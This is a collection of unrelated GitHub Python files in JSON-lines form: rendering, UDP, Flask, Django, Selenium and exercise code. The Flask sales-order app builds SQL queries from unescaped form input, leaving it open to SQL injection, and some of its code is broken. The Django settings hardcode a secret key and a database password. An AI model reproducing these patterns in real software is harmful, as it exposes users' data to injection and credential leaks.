_manager_update_task(self, task):\n \"\"\" Update task which gets called before the rendering \"\"\"\n self._listener.update()\n self._debugger.update()\n self._daytime_mgr.update()\n self._com_resources.update()\n self._stage_mgr.update()\n self._light_mgr.update()\n return task.cont\n\n def _plugin_pre_render_update(self, task):\n \"\"\" Update task which gets called before the rendering, and updates the\n plugins. This is a seperate task to split the work, and be able to do\n better performance analysis \"\"\"\n self._plugin_mgr.trigger_hook(\"pre_render_update\")\n return task.cont\n\n def _plugin_post_render_update(self, task):\n \"\"\" Update task which gets called after the rendering \"\"\"\n self._plugin_mgr.trigger_hook(\"post_render_update\")\n return task.cont\n\n def _create_common_defines(self):\n \"\"\" Creates commonly used defines for the shader auto config \"\"\"\n define = self._stage_mgr.define\n\n # 3D viewport size\n define(\"WINDOW_WIDTH\", Globals.resolution.x)\n define(\"WINDOW_HEIGHT\", Globals.resolution.y)\n\n # Pass camera near and far plane\n define(\"CAMERA_NEAR\", round(Globals.base.camLens.get_near(), 5))\n define(\"CAMERA_FAR\", round(Globals.base.camLens.get_far(), 5))\n\n # Work arround buggy nvidia driver, which expects arrays to be const\n if \"NVIDIA 361.43\" in self._showbase.win.get_gsg().get_driver_version():\n define(\"CONST_ARRAY\", \"const\")\n else:\n define(\"CONST_ARRAY\", \"\")\n\n # Provide driver vendor as a default\n vendor = self._showbase.win.get_gsg().get_driver_vendor().lower()\n if \"nvidia\" in vendor:\n define(\"IS_NVIDIA\", 1)\n if \"ati\" in vendor:\n define(\"IS_AMD\", 1)\n if \"intel\" in vendor:\n define(\"IS_INTEL\", 1)\n\n self._light_mgr.init_defines()\n self._plugin_mgr.init_defines()\n\n def _adjust_camera_settings(self):\n \"\"\" Sets the default camera settings \"\"\"\n self._showbase.camLens.set_near_far(0.1, 70000)\n self._showbase.camLens.set_fov(90)\n\n def _get_mount_mgr(self):\n \"\"\" Returns a handle to the mount manager. This can be used for setting\n the base path and also modifying the temp path. See the MountManager\n documentation for further information. \"\"\"\n return self._mount_mgr\n\n def _get_stage_mgr(self):\n \"\"\" Returns a handle to the stage manager object. The stage manager\n manages all RenderStages, shader inputs and defines, and also writing\n of the shader auto config.\"\"\"\n return self._stage_mgr\n\n def _get_plugin_mgr(self):\n \"\"\" Returns a handle to the plugin manager, this can be used to trigger\n hooks. It also stores information about the loaded plugins. \"\"\"\n return self._plugin_mgr\n\n def _get_light_mgr(self):\n \"\"\" Returns a handle to the light manager, this usually should not be used\n by the user, instead use add_light and remove_light. \"\"\"\n return self._light_mgr\n\n def _get_tag_mgr(self):\n \"\"\" Returns a handle to the tag state manager \"\"\"\n return self._tag_mgr\n\n def _get_daytime_mgr(self):\n \"\"\" Returns a handle to the DayTime manager \"\"\"\n return self._daytime_mgr\n\n # Manager properties\n mount_mgr = property(_get_mount_mgr)\n stage_mgr = property(_get_stage_mgr)\n plugin_mgr = property(_get_plugin_mgr)\n light_mgr = property(_get_light_mgr)\n tag_mgr = property(_get_tag_mgr)\n daytime_mgr = property(_get_daytime_mgr)\n","repo_name":"MYheavyGo/RenderPipeline","sub_path":"Code/RenderPipeline.py","file_name":"RenderPipeline.py","file_ext":"py","file_size_in_byte":12251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"5005179015","text":"#!/usr/bin/env python\n\nimport socket\n\nclass UDP_connect:\n def __init__(self, ip, port, buffersize):\n self._ip = ip\n self._port = port\n self._buffersize = buffersize\n\n self._UDPServerSocket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)\n self._UDPServerSocket.bind((self._ip, self._port))\n\n def get_message(self):\n bytesAddressPair = self._UDPServerSocket.recvfrom(self._buffersize)\n message = bytesAddressPair[0]\n address = bytesAddressPair[1]\n\n return [message, address]","repo_name":"kimhaafi/FRTF20-bluelining-maxIV","sub_path":"src/UDP_connection.py","file_name":"UDP_connection.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71566408440","text":"\nfrom flask import Flask, render_template, request, jsonify, json, redirect, url_for\napp = Flask(__name__)\n\n# Make the WSGI interface available at the top level so wfastcgi can get it.\nwsgi_app = app.wsgi_app\n\nimport pypyodbc\nimport db_connection as dbConn\nfrom create import Create\nimport webbrowser\nimport sys\n\n@app.route('/', methods=['POST','GET'])\n@app.route('/python', methods=['POST','GET'])\ndef python():\n try:\n \n if request.method == 'POST':\n name = request.form.get('user')\n client = request.form.get('client')\n token = request.form.get('token')\n if (name== None or token== None or name=='' or token==''):\n return render_template('Unauthorized.html');\n print(token)\n conn = dbConn.getConnection()\n cursor = conn.cursor()\n cursor.execute(\"Select Token from UserMaster Where UserName ='\"+name+\"'\")\n valids = cursor.fetchone()\n\n #print(valids[0])\n if(token == valids[0]):\n cursor.execute(\"Select * from SaleOrder where Client='\"+client+\"'\")\n data = cursor.fetchall()\n print(data)\n for row in data:\n OrderNo = row[0]\n Name = row[1]\n Mobile = row[2]\n Client = row[3]\n return render_template('Info.html',name = name, data=data);\n else:\n return render_template('Unauthorized.html')\n except Exception as e:\n sys.exit('error',e)\n return render_template(\"Unauthorized.html\")\n\n\n@app.route('/additem')\ndef additem():\n return render_template(\"NewOrder.html\")\n\n@app.route('/insertorder', methods=['POST','GET'])\ndef insertorder():\n try:\n conn = dbConn.getConnection()\n cursor = conn.cursor()\n if request.method == \"POST\":\n order=request.form['neworder']\n custname=request.form['cname']\n mobile=request.form['phn']\n allclients = request.form['clints']\n #if (order == None or order == '' or custname == None or custname == '' or mob == None or mob == ''):\n #else:\n query=\"INSERT INTO SaleOrder(Order_No,Customer_Name,Mobile_No,Client) VALUES(%s,%s,%s,%s)\"\n cursor.execute(query,(order,custname,mobile,allclients))\n connection.commit()\n return redirect(url_for('python'))\n \n except Exception as e:\n sys.exit('error',e)\n return redirect(url_for('python'))\n\nif __name__ == '__main__':\n app.run(debug=True, port=5000)\n #return json.dumps({'status':'OK','user':custname,'pass':allclients})\n #return redirect(url_for('home'))\n #return redirect(url_for('https://localhost:44384/Home.aspx'));\n\n\n#def clearAll():\n\n\n#@app.route('/back', methods=['POST', 'GET'])\n#def back():\n# try:\n# if request.methods == 'POST':\n# return redirect('Info.html');\n# #else:\n# # return redirect('Info.html');\n# except Exception as e:\n# sys.exit('error', e)\n\n\n#@app.route('/resources', methods=['GET','POST'])\n#def resources(): \n# try:\n# if request.method == 'POST':\n# Data =request.form.get(\"dt\")\n# except Exception as e:\n# print(e)\n# return render_template('Data.html', Data=Data)\n\n\n\n\n#@app.route('/ajaxfile', methods=[\"POST\",\"GET\"])\n#def ajaxfile():\n# try:\n# ncl = client\n# conn = dbConn.getConnection()\n# cursor = conn.cursor()\n\n# except Exception as e:\n# sys.exit('error',e)\n\n #cur = conn.cursor()\n #cur.execute(\"Select * from SaleOrder where Client='\"+ncl+\"'\")\n #data = cur.fetchall()\n \n #for row in data:\n # OrderNo = row[0]\n # Name = row[1]\n # Mobile = row[2]\n # Client = row[3]\n #return render_template('Info.html', data=data);\n #try:\n # conn = dbConn.getConnection()\n # cursor = conn.cursor()\n # if request.method == 'POST':\n # draw = request.form['draw'] \n # row = int(request.form['start'])\n # rowperpage = int(request.form['length'])\n # searchValue = request.form[\"search[value]\"]\n # print(draw)\n # print(row)\n # print(rowperpage)\n # print(searchValue)\n \n # ## Total number of records without filtering\n # cursor.execute(\"select count(*) as allcount from test\")\n # rsallcount = cursor.fetchone()\n # totalRecords = rsallcount['allcount']\n # print(totalRecords) \n \n # ## Total number of records with filtering\n # likeString = \"%\" + searchValue +\"%\"\n # cursor.execute(\"SELECT count(*) as allcount from test WHERE name LIKE %s OR position LIKE %s OR office LIKE %s\", (likeString, likeString, likeString))\n # rsallcount = cursor.fetchone()\n # totalRecordwithFilter = rsallcount['allcount']\n # print(totalRecordwithFilter) \n \n # ## Fetch records\n # if searchValue=='':\n # cursor.execute(\"SELECT * FROM test ORDER BY name asc limit %s, %s;\", (row, rowperpage))\n # employeelist = cursor.fetchall()\n # else: \n # cursor.execute(\"SELECT * FROM test WHERE name LIKE %s OR position LIKE %s OR office LIKE %s limit %s, %s;\", (likeString, likeString, likeString, row, rowperpage))\n # employeelist = cursor.fetchall()\n # print(employeelist)\n \n # data = []\n # for row in employeelist:\n # data.append({\n # 'name': row['Name'],\n # 'products': row['Client'],\n # #'age': row['age'],\n # #'salary': row['salary'],\n # #'office': row['office'],\n # })\n \n # response = {\n # 'draw': draw,\n # 'iTotalRecords': 3,\n # 'iTotalDisplayRecords': 3,\n # 'aaData': data,\n # }\n # return jsonify(response)\n #except Exception as e:\n # print(e)\n #finally:\n # cursor.close() \n # conn.close()\n\n\n\n\n","repo_name":"deepakt830/Data-Share","sub_path":"PythonApplication1/FlaskWebProject3/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"43185255478","text":"# Python Crash Course, Eric Matthes, no starch press\r\n# Ch8 Functions\r\n# Textbook Exercises\r\n\r\n# Louis Lozano\r\n# 3-20-2019\r\n# 8-10_great_magicians.py\r\n\r\n# Description: This program uses a function to take a list of magicians\r\n# and print their names one by one. Then it uses another function to\r\n# add 'the Great' to each name. The list is printed again to show it's\r\n# been modified.\r\n\r\n# Defines a function that takes a list of magician names and prints each\r\n# one in order. \r\ndef show_magicians(magicians):\r\n for magician in magicians:\r\n print(magician)\r\n\r\n# Defines a function that takes the list of magician and adds ' the Great'\r\n# to their name.\r\ndef make_great(magicians):\r\n # Empty list to hold great magicians\r\n great_magicians = []\r\n\r\n # while loop to add ' the Great' to each magicians name while moving\r\n # them to a new list\r\n while magicians:\r\n magician = magicians.pop()\r\n great_magician = magician + ' the Great'\r\n great_magicians.append(great_magician)\r\n\r\n # 'magicians = great_magicians' does not work.\r\n\r\n # Puts each magician back into the original list.\r\n for great_magician in great_magicians:\r\n magicians.append(great_magician)\r\n\r\n# Defines a list of magicians.\r\nmagicians = ['David', 'Chris', 'Penn', 'Teller', 'Strange']\r\n\r\n# Calls function with the list of magicians.\r\nshow_magicians(magicians)\r\n\r\n# Makes each magician great\r\nmake_great(magicians)\r\n\r\nprint('\\n')\r\n# Calls function with the modified list of magicians.\r\nshow_magicians(magicians)\r\n","repo_name":"louloz/Python-Crash-Course","sub_path":"Ch8_Functions/8-10_great_magicians.py","file_name":"8-10_great_magicians.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27189119519","text":"import requests\nimport os\nimport zipfile\n\nfrom ..getFiles import *\n\ndef test_DownloadPlantVillageCroppedSegmentedDataset():\n tomato_dataset_url = \"http://faridnakhle.com/pv/tomato-split-cropped-segmented-balanced.zip\"\n save_tomato_dataset_to = \"/content/dataset/tomato-dataset/\"\n save_tomato_dataset_as = \"tomato-split-cropped-segmented-balanced.zip\"\n DownloadPlantVillageCroppedSegmentedDataset(tomato_dataset_url, save_tomato_dataset_to, save_tomato_dataset_as)\n mainPathCreated = os.path.exists(save_tomato_dataset_to)\n train_dir = save_tomato_dataset_to + \"train\"\n val_dir = save_tomato_dataset_to + \"val\"\n test_dir = save_tomato_dataset_to + \"test\"\n trainPathExists = os.path.exists(train_dir)\n valPathExists = os.path.exists(val_dir)\n testPathExists = os.path.exists(test_dir)\n \n train_classes = [path for path in os.listdir(train_dir)]\n train_imgs = dict([(ID, os.listdir(os.path.join(train_dir, ID))) for ID in train_classes])\n train_classes_count = []\n train_file_count = 0\n for trainClass in train_classes:\n train_classes_count.append(len(train_imgs[trainClass]))\n train_file_count = train_file_count + len(train_imgs[trainClass])\n\n val_classes = [path for path in os.listdir(val_dir)]\n val_imgs = dict([(ID, os.listdir(os.path.join(val_dir, ID))) for ID in val_classes])\n val_classes_count = []\n val_file_count = 0\n for valClass in val_classes:\n val_classes_count.append(len(val_imgs[valClass]))\n val_file_count = val_file_count + len(val_imgs[valClass])\n\n test_classes = [path for path in os.listdir(test_dir)]\n test_imgs = dict([(ID, os.listdir(os.path.join(test_dir, ID))) for ID in test_classes])\n test_classes_count = []\n test_file_count = 0\n for testClass in test_classes:\n test_classes_count.append(len(test_imgs[testClass]))\n test_file_count = test_file_count + len(test_imgs[testClass])\n\n \n assert mainPathCreated == True\n assert trainPathExists == True\n assert valPathExists == True\n assert testPathExists == True\n assert train_file_count == 15228\n assert val_file_count == 1812\n assert test_file_count == 1825\n\n\ndef test_DownloadPretrainedDCNNDenseNet161TomatoModel():\n tomato_densenet161_model_url = \"http://faridnakhle.com/pv/models/RSGAI_DenseNet.zip\"\n save_densenet_model_to = \"/content/models/\"\n save_densenet_model_as = \"densenet.zip\"\n DENSENET_PRETRAINED_PATH ='/content/models/RSGAI_DenseNet.pth'\n DownloadPretrainedDCNNDenseNet161TomatoModel(tomato_densenet161_model_url, save_densenet_model_to, save_densenet_model_as)\n assert os.path.exists(save_densenet_model_to) == True\n assert os.path.isfile(DENSENET_PRETRAINED_PATH) == True","repo_name":"HarfoucheLab/Ready-Steady-Go-AI","sub_path":"Step 3 - Data Analysis/py/libs/tests/test_GetFiles.py","file_name":"test_GetFiles.py","file_ext":"py","file_size_in_byte":2730,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"24484249199","text":"# 5-10. Checking Usernames: Do the following to create a program that simulates \n# how websites ensure that everyone has a unique username.\n# •\t Make a list of five or more usernames called current_users.\n# •\t Make another list of five usernames called new_users. Make sure one or \n# two of the new usernames are also in the current_users list.\n# •\t Loop through the new_users list to see if each new username has already \n# been used. If it has, print a message that the person will need to enter a \n# new username. If a username has not been used, print a message saying \n# that the username is available.\n# •\t Make sure your comparison is case insensitive. If 'John' has been used, \n# 'JOHN' should not be accepted. (To do this, you’ll need to make a copy of \n# current_users containing the lowercase versions of all existing users.\n\ncurrentUsers = [\"ankit\", \"punkit\", \"sunkit\", \"aniket\"]\nnewUsers = []\n\nwhile(True):\n temp = input(\"Enter username: \").lower()\n if(temp == \"\" or temp == None):\n break\n else:\n newUsers.append(temp)\n\nprint()\nif(len(newUsers) != 0):\n for name in newUsers:\n if(name in currentUsers):\n print(f\"Username '{name}' already exist\\n\" + \n \"Please enter a new username\\n\")\n else:\n print(f\"Username '{name}' is available\\n\")\nelse:\n print(\"Bruh! no users\\nWe need some new users\")","repo_name":"ankitminz/python-crash-course-2nd-edition-solutions","sub_path":"Ch5/Ch5Q10/CheckingUsernames.py","file_name":"CheckingUsernames.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"72878977079","text":"\"\"\"\nExample 6\n---------\nThis example shows how to compute a series of values describing a ballistic\ndescent.\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom casex import BallisticDescent2ndOrderDragApproximation, enums, AircraftSpecs, AnnexFParms\n\n\n# Instantiate necessary classes.\nBDM = BallisticDescent2ndOrderDragApproximation()\n\n# Set aircraft values.\naircraft_type = enums.AircraftType.FIXED_WING\nwidth = 2.8\nmass = 90\n\n# Instantiate and add data to AircraftSpecs class.\naircraft = AircraftSpecs(aircraft_type, width, mass)\naircraft.set_ballistic_drag_coefficient(0.8)\naircraft.set_ballistic_frontal_area(0.6 * 0.6)\nBDM.set_aircraft(aircraft)\n\n# Set initial values for the descent.\naltitude = 100\ninitial_velocity_x = 28\ninitial_velocity_y = 0\n\n# Compute ballistic descent values.\n# Note that the return in p contains numerous different values.\np = BDM.compute_ballistic_distance(altitude, initial_velocity_x, initial_velocity_y)\n\nprint(\"Distance: {:1.1f} m \".format(p[0]))\nprint(\"Impact speed: {:1.1f} m/s\".format(p[1]))\nprint(\"Angle: {:1.1f} degs\".format(p[2] * 180 / np.pi))\nprint(\"Time : {:1.2f} s\".format(p[3]))\nprint(\"Distances: {:1.3f} {:1.3f} {:1.3f}\".format(BDM.distance1, BDM.distance2, BDM.distance3))\nprint(\"Times: {:1.3f} {:1.3f} {:1.3f}\".format(BDM.time_top, BDM.time_cross, BDM.time_impact))\nprint(\"Speeds: {:1.3f} {:1.3f}\".format(BDM.velocity_x, BDM.velocity_y))\nprint(\"\")\n\n# In the following, there are three examples, where horizontal velocity (first example), vertical velocity\n# (second example), and drag coefficient (third example) are arrays rather than scalar.\naltitude = 150\ninitial_velocity_x = np.linspace(0, 80, 100)\ninitial_velocity_y = np.linspace(-10, 10, 100)\n\nBDM.set_aircraft(aircraft)\n\n# Array for horizontal velocity and vertical velocity.\np_vel_x = BDM.compute_ballistic_distance(altitude, initial_velocity_x, -2)\np_vel_y = BDM.compute_ballistic_distance(altitude, 30, initial_velocity_y)\n\n# Array for drag coefficient.\ndrag_coef = np.linspace(0.7, 1, 100)\naircraft.set_ballistic_drag_coefficient(drag_coef)\nBDM.set_aircraft(aircraft)\np_drag_coef = BDM.compute_ballistic_distance(altitude, 30, -2)\n\n# Set up figure.\nfig, ax = plt.subplots(2, 2, figsize=(12, 6))\nplt.style.use('fivethirtyeight')\n\nax[0, 0].plot(initial_velocity_x, p_vel_x[0], linewidth=2)\nax[0, 0].set_xlabel('Initial velocity X [m/s]', fontsize=12)\nax[0, 0].set_ylabel('Impact distance [m]', fontsize=12)\nax[0, 0].set_title('Impact distance for varying initial horizontal velocity', fontsize=14)\n\nax[0, 1].plot(initial_velocity_y, p_vel_y[1], linewidth=2)\nax[0, 1].set_xlabel('Initial velocity Y [m/s]', fontsize=12)\nax[0, 1].set_ylabel('Impact velocity [m/s]', fontsize=12)\nax[0, 1].set_title('Impact distance for varying initial vertical velocity', fontsize=14)\n\nax[1, 0].plot(drag_coef, p_drag_coef[2] * 180 / np.pi, linewidth=2)\nax[1, 0].set_xlabel('Drag coefficient [-]', fontsize=12)\nax[1, 0].set_ylabel('Angle [deg]', fontsize=12)\nax[1, 0].set_title('Impact angle for varying drag coefficient', fontsize=14)\n\nax[1, 1].plot(initial_velocity_y, p_drag_coef[3], linewidth=2)\nax[1, 1].set_xlabel('Initial velocity X [m/s]', fontsize=12)\nax[1, 1].set_ylabel('Descent time [s]', fontsize=12)\nax[1, 1].set_title('Descent time for varying initial vertical velocity', fontsize=14)\n\n# Get the four scenario.\nAFP = AnnexFParms()\n\nprint(\"Ballistic descent computations\")\nprint(\"------------------------------\")\nprint(\"Class Init horiz From Terminal Impact Impact Distance Descent KE\")\nprint(\" speed altitude velocity speed angle traveled time impact\")\n\nfor c in range(5):\n print(\"{:2d} m {:3d} m/s {:4d} m {:3.0f} m/s {:3.0f} m/s {:1.0f} deg {:4.0f} m \"\n \"{:4.1f} s {:6.0f} kJ\".format(\n AFP.CA_parms[c].wingspan, AFP.CA_parms[c].cruise_speed, AFP.CA_parms[c].ballistic_descent_altitude,\n AFP.CA_parms[c].terminal_velocity, AFP.CA_parms[c].ballistic_impact_velocity,\n AFP.CA_parms[c].ballistic_impact_angle, AFP.CA_parms[c].ballistic_distance,\n AFP.CA_parms[c].ballistic_descent_time, AFP.CA_parms[c].ballistic_impact_KE / 1000))\n\nplt.show()\n","repo_name":"JARUS-QM/casex","sub_path":"casex/examples/example6_ballistic_descent.py","file_name":"example6_ballistic_descent.py","file_ext":"py","file_size_in_byte":4220,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"70530900600","text":"from __future__ import absolute_import\n\nfrom .base import *\nimport psycopg2.extensions\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'umu8tj3a&k_6zv69-(8w!xj32a64m$kaiu@76wj3!6vvr)1qv^'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nTEMPLATE_DEBUG = True\n\n# Database\n# https://docs.djangoproject.com/en/1.7/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'HOST': 'localhost',\n 'NAME': 'ffooty',\n 'USER': 'postgres',\n 'PASSWORD': 'postgres101',\n 'OPTIONS': {'isolation_level': psycopg2.extensions.ISOLATION_LEVEL_READ_UNCOMMITTED}\n }\n}\nDATABASE_OPTIONS = {\n \"autocommit\": True,\n}\nDEFAULT_FILE_STORAGE = 'storage.handlers.DatabaseStorage'\n\n\n# Testing\n#SELENIUM_WEBDRIVER = 'firefox'\n#SELENIUM_WEBDRIVER = 'phantomjs'\n# LETTUCE_APPS = ('ffooty')\n#LETTUCE_TEST_SERVER = 'lettuce.django.server.DjangoServer'\nLETTUCE_SERVER_PORT = 8999\nLETTUCE_USE_TEST_DATABASE = True\n\n# from previous settings\n# ALLOWED_HOSTS = ['localhost', '127.0.0.1']\n\n\n","repo_name":"danj1974/ffooty","sub_path":"ffooty/settings/dan.py","file_name":"dan.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9919588370","text":"\"\"\"Program to count the number of pairs of repeated characters in a string\r\nMick Perring\r\n07 May 2014\"\"\"\r\n\r\nmessage = input(\"Enter a message:\\n\") # user inputs message\r\nn = 0\r\nk = 0\r\n\r\ndef rep(message, k, n): # rep function to check for and count pairs of repeated characters in string\r\n check1 = k\r\n check2 = k + 1\r\n if check2 >= len(message): # ends function running when whole string has been checked\r\n print(\"Number of pairs:\", n) # and prints count of pairs of repeated characters\r\n return\r\n \r\n if message[check1] == message[check2]: # adds to count if pair is found\r\n n += 1\r\n rep(message, k + 2, n)\r\n \r\n else: # repeats function until string has been completely checked\r\n rep(message, k + 1, n)\r\n \r\nrep(message, k, n)","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_8/prrmic009/question2.py","file_name":"question2.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2930812344","text":"import os\nimport time\nfrom pprint import pprint\n\nfrom selenium.webdriver.chrome.webdriver import WebDriver\nfrom selenium.webdriver.support.ui import Select\n\nBASE_DIR = os.path.dirname(__file__)\n\n# Create a new instance of the Google driver\nexecutable_path = os.path.join(BASE_DIR, 'drivers', 'chromedriver')\ndriver = WebDriver(executable_path=executable_path)\n\n# go to the google home page\ndriver.get('https://www.google.com')\n\n# find the element that's name attribute is lst-ib (the google search box)\nsearch = driver.find_element_by_id('lst-ib')\nsearch.send_keys('Hillsong')\nsearch.submit()\n\n# find the elements that's names attributes are r (the google search box)\nrelated_search = driver.find_elements_by_class_name('r')\n\n# running script from python with selenium to javascript\ndriver.execute_script(\"console.log('Hello from python to js')\")\n\n# search all the links that contain the word Church\nlinks = driver.find_elements_by_partial_link_text('Church')\npprint([item.text for item in links])\n\n# running javascript code to get all the search results\nlist_hillsong_search = driver.execute_script(\"return document.querySelectorAll('.r > a')\")\npprint([item.text for item in list_hillsong_search])\n\n# opening first link using selectors css\nsong_hillsong = driver.find_element_by_css_selector('.r a')\nsong_hillsong.click()\n\n\ndef enter_to_iframe_select_and_deselect_selectHTML():\n driver.get('https://www.w3schools.com/TAGs/tryit.asp?filename=tryhtml_select_multiple')\n\n driver.switch_to.frame(\"iframeResult\")\n select = Select(driver.execute_script(\"return document.querySelector('[name=cars]')\"))\n select.select_by_value(\"volvo\")\n\n time.sleep(2)\n select.deselect_all()\n\n time.sleep(10)\n driver.close()\n driver.quit()\n\n\n# closing driver and quiting\ndriver.close()\ndriver.quit()\n","repo_name":"oscles/Test-with-selenium-and-python","sub_path":"webdriver.py","file_name":"webdriver.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12610930675","text":"#!/bin/env python3\n\nimport argparse\nimport os\nimport subprocess\nimport sys\nfrom python.distant_vfx.filemaker import CloudServerWrapper\nfrom python.distant_vfx.constants import FMP_URL, FMP_USERNAME, FMP_PASSWORD, FMP_VFX_DB, FMP_SHOTS_LAYOUT, RV_PATH, \\\n SHOT_TREE_BASE_PATH\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('reel',\n type=int,\n action='store',\n help='Reel number to conform.')\n args = parser.parse_args()\n reel = args.reel\n\n # Find latest reel qt\n print('Finding latest reel QT...')\n reel_qt = _find_latest_reel_qt(reel)\n if not reel_qt:\n print(f'Could not find QT for reel {reel}.')\n else:\n print(f'Found reel QT: {reel_qt}')\n\n # Find shot records in filemaker\n print('Searching FileMaker database for shot records...')\n records = _get_reel_versions_from_filemaker(reel)\n if not records:\n print(f'No shot records found for reel {reel}.')\n sys.exit()\n else:\n print(f'Found records in reel {reel}.')\n\n # Filter records to those with in-cut versions\n print('Filtering records with in-cut versions...')\n in_cut_records = _filter_records_with_cut_in_version(records)\n if not in_cut_records:\n print('No records found with in-cut versions.')\n sys.exit()\n else:\n print(f'Found {len(in_cut_records)} records with in-cut versions.')\n\n # Find versions on disk\n path_tuples = []\n codec_type = 'h264'\n print(f'Finding {codec_type} versions on disk...')\n for version_tuple in in_cut_records:\n version, cut_in, duration = version_tuple\n path = _find_version_on_disk(version, codec_type=codec_type)\n if path:\n print(f'Found version {version} at path: {path}')\n path_tuple = (path, cut_in, duration)\n path_tuples.append(path_tuple)\n else:\n print(f'Could not find version {version} on disk.')\n\n # Build RV command\n print(f'Building RV command...')\n cmd = _build_rv_command(reel_qt, path_tuples)\n\n # Launch RV\n print(f'Launching files in RV...')\n _launch_rv(cmd)\n\n\ndef _launch_rv(cmd):\n process = subprocess.Popen(cmd,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n universal_newlines=True,\n shell=False)\n stdout, stderr = process.communicate()\n\n\ndef _find_latest_reel_qt(reel_num):\n identifier = f'_r{reel_num}'\n reel_dir = '/mnt/Projects/dst/post/reference/reels'\n for file in os.listdir(reel_dir):\n if identifier in file:\n return os.path.join(reel_dir, file)\n return None\n\n\ndef _find_version_on_disk(version, codec_type='dnx'):\n shot = version[:7]\n seq = shot[:3]\n shot_dir = os.path.join(SHOT_TREE_BASE_PATH, seq, shot)\n shot_files = _find_files(shot_dir)\n for file in shot_files:\n ext = file.split('.')[-1]\n file_lower = file.lower()\n if codec_type in file_lower and ext == 'mov' and version.lower() in file_lower:\n return file\n return None\n\n\ndef _find_files(directory):\n for root, dirs, files in os.walk(directory):\n for file in files:\n yield os.path.join(root, file)\n\n\ndef _build_rv_command(reel_qt_path, version_path_cut_order_tuple_list):\n first_version_cut = version_path_cut_order_tuple_list[0][1]\n first_reel_arg = _construct_reel_qt_source_arg(reel_qt_path, cut_out=first_version_cut-1)\n cmd = [RV_PATH] + first_reel_arg\n\n list_len = len(version_path_cut_order_tuple_list)\n for index, version_tuple in enumerate(version_path_cut_order_tuple_list):\n path, cut_in, duration = version_tuple\n range_start = cut_in - 1\n cut_out = range_start + duration\n version_arg = _construct_version_qt_source_arg(path, range_start=range_start, cut_in=cut_in, cut_out=cut_out)\n cmd += version_arg\n\n if index == list_len - 1:\n last_reel_arg = _construct_reel_qt_source_arg(reel_qt_path, cut_in=cut_out+1)\n cmd += last_reel_arg\n break\n\n next_cut_in = version_path_cut_order_tuple_list[index + 1][1]\n if next_cut_in == cut_out + 1:\n continue\n else:\n # fill in gaps if needed with reel qt\n reel_arg = _construct_reel_qt_source_arg(reel_qt_path, cut_in=cut_out+1, cut_out=next_cut_in-1)\n cmd += reel_arg\n return cmd\n\n\ndef _construct_version_qt_source_arg(version_qt_path, range_start=None, cut_in=None, cut_out=None):\n arg = ['[', version_qt_path]\n if range_start:\n arg += ['-rs', str(range_start)]\n if cut_in:\n arg += ['-in', str(cut_in)]\n if cut_out:\n arg += ['-out', str(cut_out)]\n arg.append(']')\n return arg\n\n\ndef _construct_reel_qt_source_arg(reel_qt_path, cut_in=None, cut_out=None):\n arg = ['[', reel_qt_path]\n if cut_in:\n arg += ['-in', str(cut_in)]\n if cut_out:\n arg += ['-out', str(cut_out)]\n arg.append(']')\n return arg\n\n\ndef _filter_records_with_cut_in_version(records):\n record_cut_order_tuples = []\n for record in records:\n try:\n current_filename = record['CurrentFilename']\n assert current_filename\n cut_order = int(record['VFXEditorialShots::CutOrder'])\n duration = int(record['VFXEditorialShots::Duration'])\n record_cut_order_tuples.append((current_filename, cut_order, duration))\n except:\n pass\n return sorted(record_cut_order_tuples, key=lambda x: x[1]) # sort by cut order\n\n\ndef _get_reel_versions_from_filemaker(reel_num):\n with CloudServerWrapper(url=FMP_URL,\n user=FMP_USERNAME,\n password=FMP_PASSWORD,\n database=FMP_VFX_DB,\n layout=FMP_SHOTS_LAYOUT\n ) as fmp:\n fmp.login()\n\n query = {'VFXEditorialShots::Reel': str(reel_num)}\n records = fmp.find([query], limit=1000)\n return records\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"marklivolsi/distant-vfx","sub_path":"job_entry_points/reel_edit.py","file_name":"reel_edit.py","file_ext":"py","file_size_in_byte":6161,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"14936094196","text":"import copy\nimport datetime\nimport logging\nimport re\nimport xml.etree.ElementTree\n\nimport numpy as np\nimport renderapi\nimport skimage.transform\nimport tifffile\n\nfrom .mipmapper import Mipmapper\nfrom .render_specs import Axis, Tile\n\n# constants\nSECTION_DIR_PADDING = 3 # amount of digits in a section directory\nSECTION_DIR_GLOB = \"S\" + \"[0-9]\" * SECTION_DIR_PADDING\n# amount of digits in each coordinate on an image file name\nIMAGE_FILENAME_PADDING = 5\nTIFFILE_GLOB = (\n \"/tile-\"\n + \"[0-9]\" * IMAGE_FILENAME_PADDING\n + \"x\"\n + \"[0-9]\" * 